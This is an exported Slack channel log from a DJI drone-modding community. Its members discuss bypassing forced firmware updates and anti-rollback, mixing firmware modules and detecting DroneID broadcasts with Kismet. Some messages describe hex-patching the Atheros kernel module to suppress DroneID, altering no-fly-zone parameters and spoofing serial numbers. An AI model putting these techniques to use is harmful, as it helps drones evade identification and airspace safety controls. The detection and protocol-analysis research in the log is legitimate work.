Channel Messages

[2017-08-24 16:56:05] nocommie : set the channel description: A place to get short and concise info on progress/updates. No discussions please.

[2017-08-24 16:56:05] nocommie : @nocommie has joined the channel

[2017-08-24 17:00:17] nocommie : Confirmed on virgin android that the latest modded app (v28) does not get any popup about the Spark forced update when online. See discussion in APK Patching for additional info.

[2017-08-24 17:02:33] andreasnofear : @andreasnofear has joined the channel

[2017-08-24 17:02:51] prelator : @prelator has joined the channel

[2017-08-24 17:10:44] tylkologin : @tylkologin has joined the channel

[2017-08-24 17:14:08] haloweenhamster : @haloweenhamster has joined the channel

[2017-08-24 17:14:48] torneo : @torneo has joined the channel

[2017-08-24 17:34:45] digital1 : @digital1 has joined the channel

[2017-08-24 18:01:30] mikeman : @mikeman has joined the channel

[2017-08-24 20:35:01] ender : @ender has joined the channel

[2017-08-24 20:36:17] ender : Confirmed by kyokushin that my “switch off cache” patch in 28 reduces crashes GREATLY if not completely ( he had no crash anymore so far, had crashes often before…

[2017-08-24 23:07:36] oqradze : @oqradze has joined the channel

[2017-08-25 02:58:01] goof : @goof has joined the channel

[2017-08-25 12:46:07] nocommie : DJI has started to comply with the open source GPL <http://www.dji.com/opensource>

[2017-08-25 14:06:26] exculpo : @exculpo has joined the channel

[2017-08-25 15:55:26] stayforward : @stayforward has joined the channel

[2017-08-25 18:00:26] nocommie : There are currently several Mavic FW updates with the same exact FW number (1.3.1000). They have introduced the anti-rollback restriction in the latest just as in the 600 for Spark.

[2017-08-25 21:53:46] prelator : There are work arounds for the anti-rollback, correct?

[2017-08-27 08:04:34] kilrah : @kilrah has joined the channel

[2017-08-27 23:38:27] ripko : @ripko has joined the channel

[2017-08-28 02:53:23] cubacan : @cubacan has joined the channel

[2017-08-28 06:11:48] kiteboy : @kiteboy has joined the channel

[2017-08-29 00:41:03] hotelzululima : @hotelzululima has joined the channel

[2017-08-29 01:23:32] sbpoole : @sbpoole has joined the channel

[2017-08-30 08:02:21] kyokushin : @kyokushin has joined the channel

[2017-09-01 19:45:20] nocommie : Spark on FW 300 with latest modded app is not affected by the forced update attempt by DJI. Still able to fly on Sept 1st.

[2017-09-01 19:45:42] kilrah : it's "after sept 1"

[2017-09-01 19:46:09] kilrah : even original app still works today but you get a warning that tomorrow you're done

[2017-09-01 19:47:25] kilrah : lets see how far back app version will notify

[2017-09-01 19:51:45] nocommie : Yep. Just FYI, I am not even getting the pop-up on the modded app.

[2017-09-01 19:52:54] kilrah : ok, even 4.1.9 ios does not know about the spark grounding built-in, it comes from the net

[2017-09-01 19:53:19] kyokushin : [cancer.dji.com](http://cancer.dji.com) :joy:

[2017-09-01 20:32:36] kilrah : ok, every app version that supports spark (4.1.0 onwards) gets the message when online, but none know about it if fully offline

[2017-09-01 20:32:56] kilrah : the app doesn't download the info unless the aircraft has been connected

[2017-09-01 20:35:32] kilrah : but once it has downloaded the info it keeps it in cache (available versions)

[2017-09-01 20:37:22] kilrah : the "update required" is not cached though, so you won't get it if you're offline

[2017-09-01 20:39:03] kilrah : strangely enough it offers me updates to 500, not 600

[2017-10-09 15:24:37] nocommie : See the following to get the latest Spark fixes without giving control of your property back to the communists. I was on 300 on the spark and just flashed 600 with everything except the flight controller. Just tested and for the first time my quickshots worked perfectly. I also tested RTH both from the RC and app and it worked perfectly. I have not tested NFZ yet but all the parameters I modded in the assistant2 are still as they were before. Follow the how-to in the wiki from @joker_x3 <http://dji.retroroms.info/howto/modulemix>

[2017-10-14 19:24:29] nocommie : Just to add, I have also confirmed video gesture mode works after using this procedure.

[2017-10-15 00:05:26] coldflake : @nocommie can you send me the fw so the we can make it available in nld?

[2017-10-15 00:06:17] coldflake : I could of course do it myself but why waste time I could use RE something else? ;)

[2017-10-15 00:06:59] coldflake : ...you will be mention in the scroll text for the contribution :)

[2017-10-15 00:29:04] nocommie : Sending you a PM

[2017-10-15 07:18:45] joker_x3 : @coldflake @nocommie this are the .600 modules which have to be upgrade after being on .300 Spark firmware. It is a ready to flash package, feel free to use :) <https://drive.google.com/file/d/0B-5colMs7hnYa294SWVBVVY5X0E/view?usp=sharing>

[2017-10-16 07:54:18] carlcox89 : Nothing for Mavic guys?

[2017-10-16 13:46:44] joker_x3 : @carlcox89 you could build your own a package if you want to try. There is a wiki entry. I don’t own a Mavic, though never played with mixing modules on that.

[2017-10-16 16:03:45] nocommie : As far as I know there are no big updates to get by updating certain modules in the Mavick above FW 700. The new features such as spark flight modes on the Mavic require an app update.

[2017-10-16 18:19:46] carlcox89 : I only wanted quickshots while staying on 700 firmware

[2017-10-16 18:53:07] nocommie : From what I understand you have to update the FW and have the app where it was introduced, 4.1.8 maybe?

[2017-10-16 19:17:06] haloweenhamster : 4.1.10 but thankfully @bin4ry added it to older versions for android and it requires fw 1.3.1000 or 1.4.0000

[2017-10-16 20:03:26] carlcox89 : Yup but if one could mix 700 flight controller with other 1000 modules like you guys did with Spark..that would be awesome

[2017-10-16 20:08:55] joker_x3 : @carlcox89 why don’t you try yourself? Have you read the wiki entry?

[2017-10-16 20:10:48] carlcox89 : If I remember correctly, kilrah said there were issues when doing that with mavic

[2017-10-16 20:11:21] carlcox89 : And currently I just have my job's Mavic..mine went for dji refresh

[2017-10-16 20:32:45] kilrah : Tried 700 and 900 and was no good. No interest in the newer FWs so I won't waste time on those.

[2017-10-17 16:50:41] nocommie : Per @ender You do not need the (missing) Login patch for 4.1.9 if you install a “login patched” 4.1.3 before and login once, THEN upgrade to the 4.1.9.

[2017-11-26 21:42:37] nocommie : Mysterious version 4.1.14 verified working with mixed modules. All features work on Mavic (quickshots etc). However, you can not have this version installed along with any DJI Go3 version later than 3.1.10. Which ever is installed last will fail. For some reason this is not an issue if you use the latest official DJIGo4 and DJIGo3 from the app store.

[2017-11-26 21:53:35] czokie : @nocommie - Suggest putting this info in !wiki

[2017-11-26 21:53:52] nocommie : Already did :wink:

[2017-11-26 21:53:56] czokie : :slightly_smiling_face:

[2017-11-26 21:54:15] nocommie : under the version number of the app

[2017-11-28 22:20:02] nocommie : At least some Mavics are now shipping with no SD card and FW that writes to onboard flash instead of the SD card. So when you downgrade to an older FW, the older FW is looking for the SD card which causes errors. For now the work around is to install your own sd card. However it is unknown if this means future Mavics will ship without an SD slot at all.

[2018-01-02 19:03:43] nocommie : @nocommie has renamed the channel from "updates" to "aeroscope-droneid"

[2018-01-02 19:05:34] nocommie : Just to recap, there is ongoing work with droneid on kismet to address some issues with drones not showing up.

[2018-01-02 22:51:06] hdizzle : Hmmmm I have the options to turn off uuid and purpose for my spark. I did not know it was transmitting my home coords that is concerning me.

[2018-01-02 22:54:30] kyokushin : what version of app?

[2018-01-02 22:56:47] hdizzle : 4.1.20 iOS

[2018-01-02 22:58:39] hdizzle : I used patched APK 4.1.14 on a spare Android phone to force FCC mode and it does prompt me with the warning that I cancel each flight however people are saying the latest app forces CE when home point is updated now so not sure if I’m getting FCC. Apart from that I’m on stock .900 firmware for my Spark.

[2018-01-02 23:07:08] nocommie : Just an FYI that @hostile and the author of kismet/droneid are currently testing some things to see why some of us cant detect our drones. I would say wait until that is fixed before getting too much in the weeds with this. Once that is fixed, we can easily see what is being transmitted etc on what FW versions.

[2018-01-02 23:11:33] hdizzle : Yep watching keenly. I’m happy if it’s not semding anything :)

[2018-01-03 00:08:04] hostile : updates soon hopefully

[2018-01-03 00:15:00] hostile : anyone using kismet having the issue it would be useful if you could download the pcap from Kismet and get it my way so we can examine the packet captures.

[2018-01-03 00:16:09] nocommie : would that still be leftover from my previous run a few hours ago or do I need to fire it up again?

[2018-01-03 00:19:05] hostile : <https://twitter.com/kismetwireless/status/948347208730103813>

[2018-01-03 00:19:24] hostile : @nocommie you’d need to run it again

[2018-01-03 00:19:32] hostile : the pcap is **live** IIRC

[2018-01-03 00:20:27] nocommie : with a drone running?

[2018-01-03 00:20:57] hostile : well yeah.

[2018-01-03 00:21:02] hostile : i mean it captures live…

[2018-01-03 00:21:02] nocommie : ok lol

[2018-01-03 00:21:14] hostile : so if the drone isn’t on…. props started… GPS, etc… droneID won’t be capturable =]

[2018-01-03 00:21:50] nocommie : ok, I will see if one still exhists from earlier, if not, I will run a session

[2018-01-03 00:22:05] hostile : <http://blog.kismetwireless.net/2017/05/pcap-over-http-and-other-fun.html>

[2018-01-03 00:22:20] hostile : <http://kismet:kismet@localhost:2501/data/all_packets.pcapng> is the address of your pcaps… **always**

[2018-01-03 18:01:18] hostile : those of you <!here> with issues…. what drones are you having problems with Mavic or Spark?

[2018-01-03 18:15:31] nocommie : I tried both.

[2018-01-03 18:22:00] hostile : send me a pcap please

[2018-01-03 18:22:10] hostile : I just tested $latest spark is fine (sans RC)

[2018-01-03 18:22:26] hostile : Mavic seems to have been broken in recent release by DJI

[2018-01-03 18:27:48] nocommie : I tried getting a pcap log and failed miserably. Looked at the link you sent and tried by using the download in the front end and couldn't get it to cooperate. I am just not up to speed enough on CLI with kismet unfortunately.

[2018-01-03 18:28:17] hostile : kismet CLI is not what you use

[2018-01-03 18:28:23] hostile : once ksimet starts you use the user interface

[2018-01-03 18:28:31] hostile : top left corner click… scroll down to download pcap

[2018-01-03 18:28:45] hostile : you are using $latest kismet compiled from git, rigth?

[2018-01-03 18:30:31] nocommie : Yep, recompiled late yesterday. Yep, used the interface, bottom option. Asks for login and I entered the info on the conf file. Login just goes away and a blank web page.

[2018-01-03 18:31:04] nocommie : booting my linux box now to double check

[2018-01-03 18:31:24] nocommie : FWI, I only tested the Spark with RC, not wifi

[2018-01-03 18:32:29] hostile : k

[2018-01-03 18:32:40] hostile : what brower

[2018-01-03 18:32:47] hostile : sounds like your brower has no javascript

[2018-01-03 18:32:55] hostile : WITH RC it will never work

[2018-01-03 18:33:24] nocommie : Firefox included with kali. yeah, I found that out later. Just wanted to make sure you knew I wasnt having issues with spark and wifi

[2018-01-04 02:38:11] hdizzle : I can use Wireshark instead of Kismet yah?

[2018-01-04 02:39:51] hdizzle : @nocommie what you mean by it’s fine? is it transmitting my home coords?

[2018-01-04 02:41:21] nocommie : I don't have any idea if wireshark had droneid implemented in it. I don't know what you mean by what I mean its fine. lol

[2018-01-04 03:43:27] hdizzle : I think you said no droneid stuff was being transmitted with Mavic on latest firmware bit it is on spark is that what you mean by fine?

[2018-01-04 03:46:51] hostile : no Mavic is transmitting nulled out packets on $Latest

[2018-01-04 03:46:59] hostile : spark with RC connected transmits none

[2018-01-04 03:47:17] hostile : @nocommie droneid is a vendor IE tag…

[2018-01-04 03:47:19] hostile : nothing special

[2018-01-04 03:47:32] hostile : you can’t decode the tag as droneid

[2018-01-04 03:47:37] hostile : (using wireshark)

[2018-01-04 03:47:45] hostile : but you can at least see it is there

[2018-01-04 03:50:52] hdizzle : Yea I meant to see it, figured it probably wouldn’t decode it yet. Ah ok gotcha. Ok good I’m glad it’s not transmitting when connected to RC.

[2018-01-04 10:53:08] codeforge : droneID will be discoverable even using RC? or will be available just for wifi AC?

[2018-01-04 13:54:24] mathieu.peyrega : small kismet question... how do you "stop the downloading pcag-ng to actually get the file ?" God, so many entertaining stuff in here... i feel like a viiiirg... sorry like a child at Toyr'us :slightly_smiling_face:

[2018-01-04 13:55:21] mathieu.peyrega : by the way, I'be been compiling it to an odroid-xu4 and it's working very well (using an ALFA AWUS052NH wireless adapter)

[2018-01-04 14:57:12] hostile : @mathieu.peyrega what OS are you on? just interrupt the transfer

[2018-01-04 14:57:35] hostile : kismet is great for embedded devices

[2018-01-04 14:57:40] hostile : I have it running on RasPi zero

[2018-01-04 15:03:35] hostile : on the browser side re: OS question btw

[2018-01-04 15:04:03] mathieu.peyrega : is ubuntu mate 16.04, using chromium browser, when I press the download pcap-ng button from web interface, it starts downloading a file, but then I only have the option to pause or cancel the transfer (cancel erase the file, pause just stops downloading. There is this crdownload file in the downlaod directory that I can make a copy of)

[2018-01-04 15:04:26] mathieu.peyrega : maybe i'm just blind but I don't see a stop transfer button on kismet web interface

[2018-01-04 15:25:27] hostile : that is what I have to do on mac

[2018-01-04 15:25:32] hostile : wget on command line is easier

[2018-01-04 15:25:37] hostile : to the same address

[2018-01-04 15:25:47] hostile : then ctrlc stops it and keeps the remaining

[2018-01-04 15:27:10] mathieu.peyrega : ok, so was not me :slightly_smiling_face:

[2018-01-04 15:27:13] mathieu.peyrega : thanks

[2018-01-04 15:33:49] nocommie : @hostile still trying to get my log for you as well. Seems java is the issue with FF. Installed Chrome and it wont even launch :confused:

[2018-01-04 15:34:13] hostile : thanks!

[2018-01-07 15:43:10] cubacan : installing various receivers you could make droneflight24)

[2018-01-08 15:49:31] hostile : @cubacan you are 100% right...

[2018-01-08 15:50:00] hostile : DJI does not see that as a probable threat... they told me I was insane to think anyone would run a distributed community based DroneID detection system

[2018-01-08 20:10:10] czokie : Should we register the domain just for laughs?

[2018-01-08 20:11:09] czokie : build something that will be a data collector - stick it in tables - and provide XML back - which could be consumed by FlightRadar24 - on the condition they provide maps back under license (Save writing code)

[2018-01-08 20:24:54] cubacan : [www.droneradar24.com](http://www.droneradar24.com) is busy ))

[2018-01-08 20:33:17] hostile : [DroneIDradar24.com](http://DroneIDradar24.com) =]

[2018-01-08 20:33:26] hostile : [RemoteDroneIdentification.com](http://RemoteDroneIdentification.com)

[2018-01-08 20:33:41] hostile : [RemoteDroneID24.com](http://RemoteDroneID24.com)

[2018-01-08 21:52:27] hostile : does ANY Android User have Drone ID optional settings in their app? <https://www.dji.com/newsroom/news/dji-introduces-voluntary-flight-identification-options-for-drone-pilots>

[2018-01-08 21:52:37] hostile : @channel --^

[2018-01-08 22:00:34] haloweenhamster : I haven't in the UK

[2018-01-08 22:03:20] vo : I do not have

[2018-01-08 22:03:39] hostile : thanks fellas

[2018-01-08 22:04:00] hostile : I'm working to confirm DroneID packet corruption on Mavic $current firmware also

[2018-01-08 22:04:20] hostile : My initial tests, and the Kismet code was based on V1.03.0900

[2018-01-08 22:04:44] hostile : I'm installing V1.03.1000 now for my next round of testing

[2018-01-09 00:34:21] nocommie : Should anything less than 1.4.0100 work correctly?

[2018-01-09 00:35:02] nocommie : FYI am on mixed mod 700 and 4.0000

[2018-01-09 00:35:11] nocommie : and had issues.

[2018-01-09 00:36:21] hdizzle : Isn’t it good that it not sending packets?

[2018-01-09 00:36:22] hostile : Kismet will be updated to detect the malformed Mavic packets on $current

[2018-01-09 00:36:36] hdizzle : Why do we want the government to track us?

[2018-01-09 00:36:42] hostile : nothing below 01.03.0900 has droneid

[2018-01-09 00:36:54] hostile : who said anything about the government Sparky?

[2018-01-09 00:37:01] hdizzle : “authorities”

[2018-01-09 00:37:09] hostile : who said anything about authorities?

[2018-01-09 00:37:15] hostile : any idiot can track you

[2018-01-09 00:37:17] hdizzle : in the article you posted

[2018-01-09 00:37:28] hostile : ANY idiot…

[2018-01-09 00:37:32] hostile : not just the above

[2018-01-09 00:37:50] hdizzle : dji say the authoritues can track our drones. Yes i know anyone who can sniff wifi packets. Terrible.

[2018-01-09 00:37:56] hostile : I work for a counter drone company… so “authorized” authorities are fine..

[2018-01-09 00:38:08] hostile : they put forth a concept of only authoraties…

[2018-01-09 00:38:10] hostile : it is fallacy

[2018-01-09 00:38:14] hostile : ANY idiot can track droneid

[2018-01-09 00:38:31] hostile : so their whole concept of “authorized receivers” is garbage

[2018-01-09 00:38:54] hdizzle : If that were case they would need to encrypt the data and supply authorities with key

[2018-01-09 00:38:59] hostile : correct

[2018-01-09 00:39:11] hostile : that is exactly why I helped create the patches for kismet

[2018-01-09 00:39:22] hostile : to highlight their technical flaws in logic

[2018-01-09 00:39:25] hostile : and claims

[2018-01-09 00:41:21] hdizzle : yea the chinese always do this kind of thing

[2018-01-09 00:41:37] hdizzle : I think over there, there is no culture of privacy

[2018-01-09 00:41:40] hostile : for me I also have some problem with the fact it was on since July…

[2018-01-09 00:41:45] hostile : they acted like they JUST turned it on

[2018-01-09 00:41:59] hostile : previously it was NOT optional in any way… and NOW only if you are on Android

[2018-01-09 00:42:17] hdizzle : it’s still not optional, only the extra info is optional

[2018-01-09 00:42:30] hostile : “Recent updates to the DJI GO 4 app and DJI drone firmware, made available first for the DJI Mavic Pro last week, will allow pilots to choose whether or not to broadcast additional information about their flight operations” <https://www.dji.com/newsroom/news/dji-introduces-voluntary-flight-identification-options-for-drone-pilots>

[2018-01-09 00:42:40] hostile : “last week”!?

[2018-01-09 00:42:44] hostile : lying fuckers

[2018-01-09 00:42:54] hostile : how about last August

[2018-01-09 00:43:24] hdizzle : Yea they are allowing you to optionally broadcast a uuid for your dji user account and flight purpose. The drone heading, speed etc is all still broadcast no matter what no option which upsets me.

[2018-01-09 00:43:31] hostile : they make it read is if they JUST added this feature to do the optional broadcast.

[2018-01-09 00:43:42] hostile : instead of sayign it has been on mandatory, and NOW you can disable bits of it .=]

[2018-01-09 00:43:45] hostile : classic word smithing

[2018-01-09 00:44:44] hdizzle : Yea, be good to be able to send out false info haha

[2018-01-09 00:44:54] hdizzle : different serial no. etc

[2018-01-09 00:49:28] nocommie : The whole point of getting droneid working is so that we can accurately see what is being broadcast. personally i want to be able to see it so I can verify what I do to counter it actually works. Oh, and I want to wardrone :slightly_smiling_face:

[2018-01-09 00:50:51] hdizzle : The best way to counter it is to disable it.

[2018-01-09 00:52:03] hdizzle : if you reaaaaaaly want to leave it on and see what it sends, encrypt the data with a key that you control

[2018-01-09 00:52:23] hdizzle : that way you maintain your privacy while broadcasting it.

[2018-01-09 08:22:19] wesleymiller : idk how i feel about droneid

[2018-01-09 08:22:47] wesleymiller : i think so many people are at risk for abusing this tech that we need it. you can't fix stupid but you can reroute airplanes as a control tower operator.

[2018-01-09 14:20:12] hostile : confirmed here latest Mavic is sending out Null droneID packets...

[2018-01-09 14:22:38] hostile : @hdizzle <https://dji-rev.slack.com/archives/C6T95M0N6/p1515458684000328> I have enabled this already...

[2018-01-09 14:22:44] hostile : see here @hdizzle <https://github.com/rapid7/metasploit-framework/pull/9301>

[2018-01-09 14:54:06] nocommie : @hostile Do you think they broke droneid by accident or do you think they intentionally disabled it?

[2018-01-09 15:03:57] hostile : of course by accident

[2018-01-09 15:04:08] hostile : these jokers truncated a packet previously

[2018-01-09 15:05:56] arrvodesign : @hostile is this just the Drone ID packet or the entire Home Point, Height, Speed, etc as well?

[2018-01-09 15:06:26] hostile : the packets are fucked period

[2018-01-09 15:06:54] arrvodesign : got it, thanks

[2018-01-09 15:07:11] fallengod : Or is just their form of encyption

[2018-01-11 17:21:18] hostile : lol no

[2018-01-11 17:21:23] hostile : the fucking packets are nulled out

[2018-01-11 17:22:02] hostile : @fallengod how you gonna decrypt a string fulla zeros hommie?

[2018-01-11 18:08:04] hostile : confirmed broken on latest

[2018-01-13 00:41:00] arrvodesign : @hostile does DroneID and Flight Purpose cover all the flight metrics like ID and flight details (hight, home point etc)? would applying FlightController patch be enough or additional patches through fc_monitor to dji_network are required to get all of the pockets cleared?

[2018-01-13 00:46:24] arrvodesign : Judging from the doc, additional info is not covered with the patch and transmitted through FlightRegInfo

[2018-01-13 00:50:11] hostile : those two fields are free form text fields you edit via dji go app

[2018-01-13 00:50:28] hostile : patch would only need be the Atheros kernel module

[2018-01-13 00:50:38] hostile : or the Occusync arm modem firmware

[2018-01-13 01:34:07] arrvodesign : @hostile is there easier way? for example editing init.rc? property:dji.network_service=1 start dji_network

[2018-01-13 01:35:03] arrvodesign : there is also a service for dji_monitor

[2018-01-13 01:51:41] arrvodesign : # Load Atheros Driver insmod $MOD_DIR/compat.ko insmod $MOD_DIR/cfg80211.ko insmod $MOD_DIR/ath6kl_usb.ko

[2018-01-13 02:04:17] hostile : ath6kl_usb.ko is where the packets are sent out...

[2018-01-13 02:04:21] hostile : it is in the kernel module

[2018-01-13 02:05:43] arrvodesign : system > lib > modules > ath6k > ath6kl_usb.ko

[2018-01-13 02:10:01] hostile : yes... that one

[2018-01-13 02:10:09] hostile : it writes to a file named dji_ie

[2018-01-13 02:10:15] hostile : with the contents to go out in the packet

[2018-01-13 02:10:25] hostile : someone needs to try to chatter -i the file too

[2018-01-13 02:10:27] hostile : as a test

[2018-01-13 02:13:54] arrvodesign : @hostile the file is quite large … what is recommended / safe way to approach it?

[2018-01-13 02:21:29] arrvodesign : Looks like athsoftap.sh also sets country code from default CN: if [ “$OLD_COUNTRY_CODE” != “$DEF_COUNTRY_CODE” ] then…

[2018-01-13 03:12:43] hostile : @arrvodesign IDA pro?

[2018-01-13 13:27:22] arrvodesign : @hostile you can open it as ELF for ARM or as Binary

[2018-01-13 14:49:11] hostile : Elf for arm

[2018-01-13 15:26:21] arrvodesign : thanks @hostile it works … seems like the process is: decompile and find the line of interest through IDA and then edit that line with HEX editor as IDA cannot really compile Kernel files or at least I didn’t find a way ))

[2018-01-13 15:27:01] louisgat : DJI Spark TSS FCC

[2018-01-13 16:01:31] hostile : @arrvodesign you can patch the binary in IDA.. <https://marcoramilli.blogspot.com/2011/01/how-to-patch-binary-with-ida-pro.html>

[2018-01-13 16:01:56] hostile : alternately... you could just recompile the atheros kernel module

[2018-01-13 16:01:57] hostile : =]

[2018-01-13 16:02:05] hostile : sans modifications

[2018-01-14 23:58:52] arrvodesign : As per doc, 700 and 800 have the same MD5 as earlier versions, which means no DroneID … so it starts from 900 after 2017-06-01

[2018-01-15 00:16:49] arrvodesign : @hostile are you sure the metrics is sent within older FW? couldn’t find anything related to reg_info pocket …

[2018-01-15 00:57:07] hostile : @arrvodesign I am 100% sure DroneID started with .900 and after

[2018-01-15 19:00:54] wesleymiller : ID doesn't transmit until the motors start?

[2018-01-15 19:07:23] arrvodesign : @wesleymiller that's correct only for FW with drone id 900+

[2018-01-23 21:43:36] hostile : Latest Kismet has fixes to detect the broken mavic case.

[2018-01-23 21:44:14] hostile : <https://github.com/kismetwireless/kismet/commit/88dba31311c2397ef043f338fe37a3893b8ed15d>

[2018-01-23 21:50:19] nocommie : Cool. I will be testing it soon!

[2018-01-29 22:25:09] hostile : We've just added some patches that allow you to pick up the AdHoc networks that DJI uses on Spark RC (and Mavic Air) <https://github.com/kismetwireless/kismet>

[2018-01-29 22:25:18] hostile : your kernel may need support to tune to those channels..

[2018-01-31 00:31:59] nocommie : <https://www.suasnews.com/2018/01/dji-bridging-gap-civilians-uas-aeroscope/>

[2018-01-31 20:21:19] hostile : this is the latest Kismet detecting my MavicAir...

[2018-01-31 20:28:34] djislack : Holy fuck that is awesome

[2018-01-31 20:28:47] djislack : Time for some warbalooning

[2018-02-01 06:04:22] hostile : <https://twitter.com/d0tslash/status/958943719025266688>

[2018-04-01 16:58:48] codeforge : hi and happy easter to all :slightly_smiling_face: playing with kismet i can't detect mavic-air signal with current kismet scanning. Will be possible in the future to detect it? Or kismet can detect just spark and mavic in wifi mode?

[2018-04-01 18:28:32] validat0r : @codeforge have you switched your wifi card to 5kHz mode?

[2018-04-01 18:29:47] codeforge : mmm no... i set it in monitor mode

[2018-04-01 18:30:19] codeforge : i will try to set it in 5kHz mode, thanks :)

[2018-04-01 18:31:09] validat0r : for me it was also worth to try 2,4GHz since I didn't receive droneid with 5GHz

[2018-04-01 18:32:05] codeforge : i set mavic-air wifi to 2.4Ghz but kismet cannot see it. I think i will buy an sdr hw

[2018-04-01 18:32:44] validat0r : 5kHz should do the trick. i have an ancient atheros ath5k card, and it's visible

[2018-04-01 18:33:48] validat0r : the packets are crippled with my spark. MA should be interesting

[2018-04-01 18:34:51] codeforge : thanks i will try that

[2018-04-01 19:08:39] kilrah : only a few chipsets support the 5M bandwidth, need very specific cards

[2018-04-01 19:10:40] codeforge : could you suggest someone?

[2018-04-01 19:16:05] validat0r : @hostile had one he recommended to me, but bloody slack hid the conversation.

[2018-04-01 19:16:25] codeforge : all my cards cannot work at 5ghz, i'm buying an AWUS051NH v2

[2018-04-01 19:16:57] validat0r : i think he said something about PCI express and ath10k compatible

[2018-04-01 19:18:04] validat0r : he suggested there's no usb dongle with good 5GHz/5MHz capabilities

[2018-04-01 19:19:27] validat0r : @codeforge you should check if the ALFA has ath10k compatible chipset

[2018-04-01 19:20:22] validat0r : I have an alpha with older chipset (no 5GHz) but looks the same and I wasn't able to read any droneid stuff with it

[2018-04-01 19:23:35] codeforge : mmm... ok thanks for the info... i will search online for that card

[2018-04-01 19:24:15] validat0r : source=wlan10k0:add_channels="149W5,153W5,157W5,161W5,165W5,151W5,155W5,159W5,163W5,153W5,1W5,2W5,3W5,4W5,5W5,6W5,7W5,8W5,9W5,10W5,11W5,12W5,13W5,14W5"

[2018-04-01 19:24:59] validat0r : this is the /usr/local/etc/kismet_site.conf entry i used .. "wlan10k0" is to be adjusted to your system

[2018-04-01 19:28:35] validat0r : @codeforge it's not ath10k but ath5k or ath9k compatibility .. just checked my notes

[2018-04-01 19:36:01] codeforge : ok, great :+1:

[2018-04-02 04:21:56] hostile : Yeah no known usb at this time

[2018-04-02 04:22:16] hostile : Must be atk9k pci or m.2

[2018-04-02 04:22:44] hostile : I’ve got some ath6k from China I’m testing

[2018-04-02 04:22:52] hostile : Ath5k cardbus works also

[2018-04-05 16:38:56] mathieu.peyrega : I have to recheck, but I guess I tryed with "ALFA Network awus052nh" usb adapter and it was working...

[2018-04-05 17:22:16] hostile : yeh?

[2018-04-05 17:22:19] hostile : which driver?

[2018-04-05 17:22:47] hostile : your kismet_site.conf has added 5W channels for this card also?

[2018-04-06 09:13:21] mathieu.peyrega : I just rechecked and yes, it seems to be working. Not sure it got all 5G channels but right now the ui is showing activity on channel 48

[2018-04-06 09:14:08] mathieu.peyrega : i'm using ubuntu mate 16.04, no special tuning, out of box auto driver selection

[2018-04-06 09:14:34] validat0r : so did you catch any AC ad-hoc packets?

[2018-04-06 09:15:13] mathieu.peyrega : not tryed specifically with drone packet if that was the initial question (hope this is not a big quiproquo)

[2018-04-06 09:15:36] mathieu.peyrega : but the adapter is seeing regular WiFi traffic

[2018-04-06 09:17:32] validat0r : a confirmation that kismet detected droneids (on 5GHz)with this card would be nice

[2018-04-06 09:18:55] mathieu.peyrega : i'll check that...

[2018-04-06 09:19:19] validat0r : :+1:

[2018-04-06 09:19:51] mathieu.peyrega : should work with Spark or only MAvic ?

[2018-04-06 09:24:58] validat0r : hm .. to my knowledge spark and mavic work similar, with the exception that spark produces crippled packets ...

[2018-04-06 09:26:40] validat0r : @codeforge was initially interested .. so maybe he could chime in here

[2018-04-06 09:50:14] codeforge : hi, yes i'm trying to use kismet to detect packet. I'm waiting to receive the pcie card to see if i can detect droneid with spark and mavic. With spark now i can see just the serial number when setting spark without rc in wifi mode in 2.4ghz...

[2018-04-06 09:57:44] mathieu.peyrega : seing Spark-RC AP and one Wifi adhoc with "AtherosC" type when switching Spark to 2.4 GHz band. Seems not to be working on 5G band, but this may be some config and regdom issue on the PC itself (seing messages from kismet about this)

[2018-04-06 09:59:55] validat0r : @ilovemynexus4 shared a file: [kismet](https://dji-rev.slack.com/files/U8X0X24F8/F9UUVBWNB/image.png)

[2018-04-06 10:00:15] validat0r : this was my output when putting my spark in 2,4Ghz mode

[2018-04-06 10:00:40] validat0r : coloring must be activated in kismet menu for detected drones/uavs

[2018-04-06 11:11:47] kilrah : did you do the kismet config command to add the 5MHz channels? you see if it complains that they're not supported

[2018-04-06 13:06:08] mathieu.peyrega : stangely, i'm getting a few adhoc devices, but none involving Spark or Spark-RC. Not getting anything with respect to MAvic Pro Platinium either (motors off in both case...)

[2018-04-06 13:13:15] hostile : @ilovemynexus4 so it looks like you can at least tune to 5mhz channels on 2.4ghz...

[2018-04-06 13:13:49] hostile : you can see the 62:60:1f adhoc AP, which is good.

[2018-04-06 13:47:32] validat0r : @kilrah yes, @hostile was so nice as to provide me with the kismet_site.conf line ... not sure if ch149 is supported. it's listet and not removed, but i don't see no packets

[2018-04-06 13:48:12] kilrah : you see in the console output of the server if it's rejected

[2018-04-06 13:48:28] kilrah : it will show in the web interface no matter how so you've got to check that

[2018-04-06 13:48:39] validat0r : @mathieu.peyrega droneid is generated only after motors have started, not before.

[2018-04-06 13:49:04] validat0r : but packets are visible before, of course

[2018-04-06 13:49:53] validat0r : @kilrah it was my understanding, that kismet removes the channels which are not working on its own after they haven't worked for a couple of tries

[2018-04-06 13:50:14] validat0r : but that may be not very reliable

[2018-04-06 13:51:04] validat0r : anyway, i did my research into droneid a couple of weeks ago. i know how to switch it off, so i dont care that much any moe

[2018-04-06 13:58:49] hostile : @ilovemynexus4 which card is it again? I will look up the chipset and see if there are any hints on why it may do 5mhz at 2.4ghz, but not on 5.8ghz

[2018-04-06 17:58:04] hostile : oh hey guys, you can also use gr-80211 to detect spark / mavic air fwiw. <https://github.com/bastibl/gr-ieee802-11>

[2018-04-07 13:17:52] codeforge : hi, do you think that an hackrf could detect it?

[2018-04-07 15:17:20] hostile : yes

[2018-04-07 15:24:20] codeforge : thanks :+1:

[2018-04-09 15:58:23] mathieu.peyrega : Sorry this is in French, but it seems that in France, UAV over 800g will have to implement a "droneid" like protocol from beginning of July : <https://www.helicomicro.com/2018/04/05/signalements-electronique-lumineux-les-projets-de-textes-dapplications/>

[2018-04-09 16:08:26] ben_lin : So not p4p

[2018-04-09 16:09:00] ben_lin : Oh no

[2018-04-09 16:09:09] ben_lin : If it counts battery

[2018-04-09 16:11:25] mathieu.peyrega : this doc gives tech details about the frame format and frequencies/protocol that should be used : <http://newsletter.ffam.asso.fr/nwlt/fichiers/projet-arrete-signalement.pdf>

[2018-04-09 16:13:12] mathieu.peyrega : (page 3/6). Is the current DJI droneid implementation matching this wifi 802.11.n requirement ? Obvisously it will not match everything as it is also required to be unencryted !

[2018-04-09 21:45:44] validat0r : wow

[2018-04-09 22:00:28] validat0r : nice find @mathieu.peyrega

[2018-04-09 22:01:47] validat0r : Article 6 defines a signaling light, not green, red or white, flashing in morse "U"

[2018-04-09 22:01:57] validat0r : . . _

